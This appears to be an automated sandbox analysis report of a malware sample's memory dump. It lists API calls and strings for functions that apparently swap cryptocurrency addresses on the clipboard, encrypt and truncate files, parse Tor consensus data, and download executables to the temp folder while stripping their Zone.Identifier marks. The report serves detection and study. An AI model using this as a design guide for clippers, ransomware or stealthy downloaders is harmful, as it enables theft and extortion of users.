GlobalAlloc.KERNEL32(00002002,?), ref: 0077F5DE
GlobalLock.KERNEL32(?), ref: 0077F5EB
memcpy.MSVCRT ref: 0077F604
GlobalUnlock.KERNEL32(?), ref: 0077F610
OpenClipboard.USER32(00000000), ref: 0077F618
EmptyClipboard.USER32 ref: 0077F622
SetClipboardData.USER32(0000000D,?), ref: 0077F62E
CloseClipboard.USER32 ref: 0077F634

Strings

dex, xrefs: 0077F59A
bitcoincash, xrefs: 0077F4A6
bitcoincash:, xrefs: 0077F1BF
0, xrefs: 0077F349
cosmos, xrefs: 0077F1EC
dex, xrefs: 0077F5A1, 0077F58F, 0077F55C, 0077F530, 0077F540, 0077F4C7, 0077F494, 0077F482, 0077F470, 0077F44C, 0077F416, 0077F3DD, 0077F3CB, 0077F395, 0077F35F, 0077F4CA, 0077F543, 0077F55F
bnb, xrefs: 0077F53B
addr, xrefs: 0077F4F0
band, xrefs: 0077F557
addr, xrefs: 0077F216
bitcoincash:, xrefs: 0077F283
cosmos, xrefs: 0077F4C2

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockiswalphaiswdigitlstrlenmemcpywcslen
String ID: 0$addr$addr$band$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos$dex$dex
API String ID: 2964143298-3838210704
Opcode ID: 9bd23431d3ca653ecfc886f7c942037a049d0abc445fc312dda6ec0dc0ddc014
Instruction ID: fdcc26e8b4217c243f76d140f9a2c2e79caf8b96dbf6edb1a20b38cec9c8cbc7
Opcode Fuzzy Hash: 9bd23431d3ca653ecfc886f7c942037a049d0abc445fc312dda6ec0dc0ddc014
Instruction Fuzzy Hash: A61235B1A00219EBCF58DF50C6944BD7BB2BF42795FA0C069E8899F254D738DE90DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0077FE60 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 178
filememoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptImportKey.ADVAPI32(00000000,00785940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FE8A
CreateFileW.KERNEL32(00780750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,00780750), ref: 0077FEAB
GetFileSize.KERNEL32(000000FF,00000000), ref: 0077FEC4
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 0077FEE5
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0077FF04
CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?), ref: 0077FF56
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0077FF8D
HeapAlloc.KERNEL32(00000000), ref: 0077FF94

Part of subcall function 0077FD80: memcpy.MSVCRT ref: 0077FDDF
Part of subcall function 0077FD80: memcpy.MSVCRT ref: 0077FDF3
Part of subcall function 0077FD80: CryptImportKey.ADVAPI32(00000000,00000008,0000001C,00000000,00000000,00000000), ref: 0077FE17
Part of subcall function 0077FD80: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 0077FE3D
Part of subcall function 0077FD80: CryptDestroyKey.ADVAPI32(00000000), ref: 0077FE50

CryptHashData.ADVAPI32(?,00000000,00000000,00000000), ref: 0077FFD4
CryptVerifySignatureA.ADVAPI32(?,?,?,00000000,00000000,00000000), ref: 0077FFF5
memcpy.MSVCRT ref: 0078000F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0078001D
HeapFree.KERNEL32(00000000), ref: 00780024
UnmapViewOfFile.KERNEL32(00000000), ref: 0078002E
CloseHandle.KERNEL32(00000000), ref: 00780038
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00780052
SetEndOfFile.KERNEL32(000000FF), ref: 0078005C
CloseHandle.KERNEL32(000000FF), ref: 00780066
CryptDestroyKey.ADVAPI32(00000000), ref: 00780070

Strings

NGS!, xrefs: 0077FF1A

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Crypt$File$Heap$Creatememcpy$CloseDestroyHandleHashImportProcessView$AllocDataEncryptFreeMappingPointerSignatureSizeUnmapVerify
String ID: NGS!
API String ID: 1316431928-4070929822
Opcode ID: 509225d11d4a8d2ee5d2508d1c46b086076f6c763362beaea5b9df63c71cb64c
Instruction ID: 4ca2784053d65fe1ce15f5b8195117e57b4b6eddafd8709520c0210c44ac7249
Opcode Fuzzy Hash: 509225d11d4a8d2ee5d2508d1c46b086076f6c763362beaea5b9df63c71cb64c
Instruction Fuzzy Hash: 52611175A40209EFDB14DBE4CD49FAEBBB5BB48700F248548F605BB280D779A940CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007809F0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00780F9D,00000000), ref: 007809FF
wsprintfW.USER32 ref: 00780A15
FindFirstFileW.KERNEL32(?,?), ref: 00780A2C
lstrcmpW.KERNEL32(?,00787048), ref: 00780A51
lstrcmpW.KERNEL32(?,0078704C), ref: 00780A67
wsprintfW.USER32 ref: 00780A8A
wsprintfW.USER32 ref: 00780AAA
MoveFileExW.KERNEL32(?,?,00000009), ref: 00780AE6
FindNextFileW.KERNEL32(000000FF,?), ref: 00780AFA
FindClose.KERNEL32(000000FF), ref: 00780B0F
RemoveDirectoryW.KERNEL32(?), ref: 00780B19

Strings

%s\*, xrefs: 00780A09
%s\%s, xrefs: 00780A7E
%s\%s, xrefs: 00780A9E

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: 20c532b906107e19feee765081c7a8f68861a9fa0d28062ed2222936e84fd475
Instruction ID: ec575a2487ee0cc99f793fd88b825721326b57fa79d2012088464d7b9dd8653d
Opcode Fuzzy Hash: 20c532b906107e19feee765081c7a8f68861a9fa0d28062ed2222936e84fd475
Instruction Fuzzy Hash: 7F3184B5980608DFCB54EB70DC89EDA777CBB44301F50C588F60992141EB38DA48CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00778E30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 120
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(00000002,00000001,00000006), ref: 00778E40
setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 00778E73
htons.WS2_32(00000000), ref: 00778E8C
htonl.WS2_32(7F000001), ref: 00778EA4
bind.WS2_32(00000000,?,00000010), ref: 00778EB9
listen.WS2_32(00000000,00000064), ref: 00778ED0
getsockname.WS2_32(00000000,?,00000010), ref: 00778EF4

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

htons.WS2_32(?), ref: 00778F2D
htons.WS2_32(?), ref: 00778F56
closesocket.WS2_32(00000000), ref: 00778FB6

Strings

http://127.0.0.1:%hu, xrefs: 00778F1B
127.0.0.1:%hu, xrefs: 00778F08

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: htons$bindclosesocketgetsocknamehtonllistenmemmovesetsockoptsocket
String ID: 127.0.0.1:%hu$http://127.0.0.1:%hu
API String ID: 1977552280-2042925195
Opcode ID: 027b4c1e1ff7c9ea7889aa20ba1056f2207e2fe473eb670cb09a90c863545d5b
Instruction ID: 6af6e3ad9a693779abdea868d910698aab9aea55d5b6e4303fd55ff21c9e133c
Opcode Fuzzy Hash: 027b4c1e1ff7c9ea7889aa20ba1056f2207e2fe473eb670cb09a90c863545d5b
Instruction Fuzzy Hash: 3B41B4B2A90204AFDB10DFA4DC49FBE7B79BB44701F14C408F7459A1D1EBB89900CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00772120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

memmove.MSVCRT ref: 00772194
CryptAcquireContextA.ADVAPI32(0078A014,00000000,?,0000000D,F0000000), ref: 007721DE
CryptAcquireContextA.ADVAPI32(0078A11C,00000000,?,00000018,F0000000), ref: 007721FA
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00772223
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0077223C

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00772148
Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider, xrefs: 0077215B

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: ContextCrypt$AcquireReleasememmove
String ID: Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 2654783079-2824478982
Opcode ID: e9bb65ef5e50282e8991c24f044d582c23a48033da7d412c8fe81bee44015bb7
Instruction ID: 4d2964ff020905bf22a70ef067067cc6ccffec0833662477510b39ae6517f785
Opcode Fuzzy Hash: e9bb65ef5e50282e8991c24f044d582c23a48033da7d412c8fe81bee44015bb7
Instruction Fuzzy Hash: 9F21A9B1AC0304BAFB20A7609C1BFE937246B60700F64C055F648651C3F9ED564897A7

Uniqueness

Uniqueness Score: -1.00%

Function 00772680 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 007726B0
CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,?), ref: 007726CD
CryptSetKeyParam.ADVAPI32(?,00000004,00000002,00000000), ref: 007726F0
memmove.MSVCRT ref: 0077270D
CryptDestroyKey.ADVAPI32(?,?,00000004,00000002,00000000), ref: 0077274F

Strings

~(w, xrefs: 007726AC, 007726AF

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Crypt$memmove$DestroyImportParam
String ID: ~(w
API String ID: 4072243228-840095357
Opcode ID: eae9fa73bb8cf25d1dac6bfa38308c7c98d924aa141b6286e647c7ad1b95cd9e
Instruction ID: e23f67c60975db6123d968988427d8e98024740532c06bcca194bff24db257ec
Opcode Fuzzy Hash: eae9fa73bb8cf25d1dac6bfa38308c7c98d924aa141b6286e647c7ad1b95cd9e
Instruction Fuzzy Hash: 4A219174A40248ABEB14CFA0CC85FEE7BB4AF58340F14C408FA596B281D779DA45CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00772B60 Relevance: 7.6, APIs: 5, Instructions: 87encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00772BC6
memmove.MSVCRT ref: 00772BE1

Part of subcall function 007722B0: CryptGenRandom.ADVAPI32(?,00772BFD,0077A356,?,00772BFD,0077A356,00000080), ref: 007722C2

CryptImportKey.ADVAPI32(?,0077A466,00000190,00000000,00000001,?), ref: 00772C1F
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 00772C45
CryptDestroyKey.ADVAPI32(?), ref: 00772C79

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Crypt$memmove$DestroyExportImportRandom
String ID:
API String ID: 2808701524-0
Opcode ID: 59415d5a1c5d0d7c57e9bd9515dcabea7924eab71d316385c59c8d7f2577b873
Instruction ID: 3559add37bd3376d824f9d8868975973ac9f1288420ae2cf4ce9e1598ff2c79d
Opcode Fuzzy Hash: 59415d5a1c5d0d7c57e9bd9515dcabea7924eab71d316385c59c8d7f2577b873
Instruction Fuzzy Hash: 6731C1B4640208BBEB10DF64CC8AF9A7B75AB44344F14C148FA485F3C2E679EA858B95

Uniqueness

Uniqueness Score: -1.00%

Function 0077FD80 Relevance: 7.6, APIs: 5, Instructions: 79encryptionCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0077FDDF
memcpy.MSVCRT ref: 0077FDF3
CryptImportKey.ADVAPI32(00000000,00000008,0000001C,00000000,00000000,00000000), ref: 0077FE17
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 0077FE3D
CryptDestroyKey.ADVAPI32(00000000), ref: 0077FE50

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Crypt$memcpy$DestroyEncryptImport
String ID:
API String ID: 774555595-0
Opcode ID: a8377d4a8c58045ce65df851877e50f2ed50b6debd0dc0bb2d11d7e42eb51a6c
Instruction ID: b6793348c2dc29b59a3e1628cc4addbde42674d157ef8914927aba3155d4501d
Opcode Fuzzy Hash: a8377d4a8c58045ce65df851877e50f2ed50b6debd0dc0bb2d11d7e42eb51a6c
Instruction Fuzzy Hash: 99310BB5A44249EFDF00CFE8C845BEEBBB5AF58300F148559E619B7280D7749A04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00772420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50encryptionCOMMON

Download Yara Rule

APIs

CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000040,?,0077254A,?,00772593), ref: 00772446
CryptGetKeyParam.ADVAPI32(00000004,00000009,?,00000004,00000000,?,00000000,00000040,?,0077254A,?), ref: 00772469
CryptDestroyKey.ADVAPI32(00000000,?,00000000,00000040,?,0077254A,?), ref: 0077248F

Strings

J%w, xrefs: 00772432, 00772438

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Crypt$DestroyImportParam
String ID: J%w
API String ID: 4196615532-2766071164
Opcode ID: f4c2bc7490b23e8b647580b33ed9d7b98edf6f47f7cf7e3bc708016f34fe85bb
Instruction ID: 105660dfc99f82f91db85c423af7801eb48dcc198dd67e490cf1c4d8db0d71d7
Opcode Fuzzy Hash: f4c2bc7490b23e8b647580b33ed9d7b98edf6f47f7cf7e3bc708016f34fe85bb
Instruction Fuzzy Hash: 83115274740248FFDB10DFA4C855FAEBB79AB45300F10C199F9459B281E6749A01CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00772C90 Relevance: 6.1, APIs: 4, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00772CB0
CryptImportKey.ADVAPI32(?,?,00000190,00000000,00000001,?), ref: 00772CED
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 00772D1C
CryptDestroyKey.ADVAPI32(?), ref: 00772D5D

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: Crypt$DestroyExportImportmemmove
String ID:
API String ID: 1806151904-0
Opcode ID: 87bc8ab245c49b47d2f07680b9332e0e006adbaf6f71e5bcb42be875b34330ae
Instruction ID: 4dd4f23f5f5359bed63862f05b82ffe09345606fce80baa4e74789ab0b832aa0
Opcode Fuzzy Hash: 87bc8ab245c49b47d2f07680b9332e0e006adbaf6f71e5bcb42be875b34330ae
Instruction Fuzzy Hash: 4B219A72A40618AFEF30DB64DC49FDA7778AF49701F0441C8F60D9A1C1E6749B948FA5

Uniqueness

Uniqueness Score: -1.00%

Function 007729F0 Relevance: 6.0, APIs: 4, Instructions: 43encryptionCOMMON

Download Yara Rule

APIs

CryptHashData.ADVAPI32(000001FD,00000000,?,00000000,000001FD), ref: 00772A08
CryptDuplicateHash.ADVAPI32(000000FF,00000000,00000000,000000FF), ref: 00772A1E
CryptGetHashParam.ADVAPI32(000000FF,00000002,?,?,00000000), ref: 00772A38
CryptDestroyHash.ADVAPI32(000000FF), ref: 00772A4B

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CryptHash$DataDestroyDuplicateParam
String ID:
API String ID: 1241924263-0
Opcode ID: be049e702805bff8f444976216d95040f579d1b1f0e5132d5da2aedbef204dc8
Instruction ID: f009505f04be4bdf83e84d31fc96e7ffe0d62be032b8f3937dc159def9819789
Opcode Fuzzy Hash: be049e702805bff8f444976216d95040f579d1b1f0e5132d5da2aedbef204dc8
Instruction Fuzzy Hash: 4E012879680208BBDB10CFB4DC46FAE7BB9AB48740F108158FE05DA280D675DA018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00780410 Relevance: 77.2, APIs: 38, Strings: 6, Instructions: 235
sleepfilenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00780419
srand.MSVCRT ref: 00780420
rand.MSVCRT ref: 00780428
Sleep.KERNEL32 ref: 0078043F
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 0078045D
strlen.MSVCRT ref: 00780467
mbstowcs.MSVCRT ref: 0078047E
rand.MSVCRT ref: 00780486
rand.MSVCRT ref: 0078049A
wsprintfW.USER32 ref: 007804C1
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007804D7
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00780506
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00780535
memset.MSVCRT ref: 0078055C
InternetReadFile.WININET(00000000,?,00000207,?), ref: 0078057E
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 007805AF
CloseHandle.KERNEL32(000000FF), ref: 007805BE
Sleep.KERNEL32(000003E8), ref: 007805C9
wsprintfW.USER32 ref: 007805E2
DeleteFileW.KERNEL32(?), ref: 007805F2
Sleep.KERNEL32(000003E8), ref: 007805FD
Sleep.KERNEL32(000003E8), ref: 0078061E
DeleteFileW.KERNEL32(?), ref: 0078064B
CloseHandle.KERNEL32(000000FF), ref: 00780658
InternetCloseHandle.WININET(00000000), ref: 00780665
InternetCloseHandle.WININET(00000000), ref: 00780672
Sleep.KERNEL32(000003E8), ref: 0078067D
rand.MSVCRT ref: 00780692
Sleep.KERNEL32 ref: 007806A9
rand.MSVCRT ref: 007806AF
rand.MSVCRT ref: 007806C3
wsprintfW.USER32 ref: 007806EA
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00780707
wsprintfW.USER32 ref: 00780723
DeleteFileW.KERNEL32(?), ref: 00780733
Sleep.KERNEL32(000003E8), ref: 0078073E
Sleep.KERNEL32(000003E8), ref: 0078075F
DeleteFileW.KERNEL32(?), ref: 0078077D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 007804D2
%ls\%d%d.exe, xrefs: 007806DE
%ls:Zone.Identifier, xrefs: 00780717
%ls\%d%d.exe, xrefs: 007804B5
%ls:Zone.Identifier, xrefs: 007805D6
%temp%, xrefs: 00780458

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: FileSleep$rand$Internet$CloseDeleteHandlewsprintf$Open$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
API String ID: 827890202-3055678928
Opcode ID: f14437b4be0b807f224b608bfecf9adcf6e18ade73e416a56b7468851da3df73
Instruction ID: 775f35be03b1b988804902e2d68035037fc3725871fe9dd81d92d312b5ed67a9
Opcode Fuzzy Hash: f14437b4be0b807f224b608bfecf9adcf6e18ade73e416a56b7468851da3df73
Instruction Fuzzy Hash: 1D81D9B5A80718EBDB10EB60DC4DFE93339BBC8701F148598B209951D1EABC9B94CF65

Uniqueness

Uniqueness Score: -1.00%

Function 007781C0 Relevance: 37.2, APIs: 2, Strings: 19, Instructions: 490
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

Part of subcall function 007735D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,0078403F,00000001,?,00783F8F,-00000007,?,0077EEB2,-00000053,?,0077EE82,-00804C3B,?,0077ED83), ref: 007735DB

inet_ntop.WS2_32(00000002,?,?,00000080), ref: 007783E6
lstrlenA.KERNEL32(?,?,00000014,00000040), ref: 007787A5

Strings

Exit, xrefs: 007782D1
s , xrefs: 0077857F
p , xrefs: 0077854B
r , xrefs: 007784B8
Valid, xrefs: 00778253
directory-footer, xrefs: 007781FB
HSDir , xrefs: 00778227
Running, xrefs: 00778292
BadExit, xrefs: 007782E7
Guard, xrefs: 007782A5
Stable, xrefs: 00778266
circwindow=, xrefs: 00778211
%*s %s %s %*s %*s %*s %s %s %hu, xrefs: 0077823D
http://%s:%hu/tor/status-vote/current/consensus.z, xrefs: 007781E5
<, xrefs: 007787C2
Fast, xrefs: 0077827C
StaleDesc, xrefs: 007782BB
r , xrefs: 007784EC
accept 1-65535, xrefs: 007782FD

Memory Dump Source

Source File: 00000005.00000002.2426241275.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000005.00000002.2426220938.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426277406.0000000000785000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426299881.0000000000789000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2426319260.000000000078B000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_770000_lsass.jbxd

Similarity

API ID: CriticalEnterSectioninet_ntoplstrlenmemmove
String ID: p $r $r $s $ BadExit$ Exit$ Fast$ Guard$ Running$ Stable$ StaleDesc$ Valid$ circwindow=$%*s %s %s %*s %*s %*s %s %s %hu$<$HSDir $accept 1-65535$directory-footer$http://%s:%hu/tor/status-vote/current/consensus.z
API String ID: 3485021903-298003833
Opcode ID: 2c119e0a21f99d4081f538c12631cd577d89f67a5c9031a9f1e08b0f9d47a58f
Instruction ID: 19f3b3eb210a674e84b54879955412e5b174b139d37d1c78d25243409d45e501
Opcode Fuzzy Hash: 2c119e0a21f99d4081f538c12631cd577d89f67a5c9031a9f1e08b0f9d47a58f
Instruction Fuzzy Hash: DA2292B59442689FDF24DB90CC49FEDB7B8EB44340F1484D9E60DB6182DB789A84CF62

Uniqueness

Uniqueness Score: -1.00%

Function 007762E0 Relevance: 28.4, APIs: 10, Strings: 6, Instructions: 351
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00772100: memmove.MSVCRT ref: 0077210F

lstrlenA.KERNEL32(00000000), ref: 0077636F
SetLastError.KERNEL32(00000000), ref: 0077639F
lstrlenA.KERNEL32(00000000), ref: 007763AF
lstrlenA.KERNEL32(00000000), ref: 0077640F
lstrlenA.KERNEL32(?), ref: 0077653A
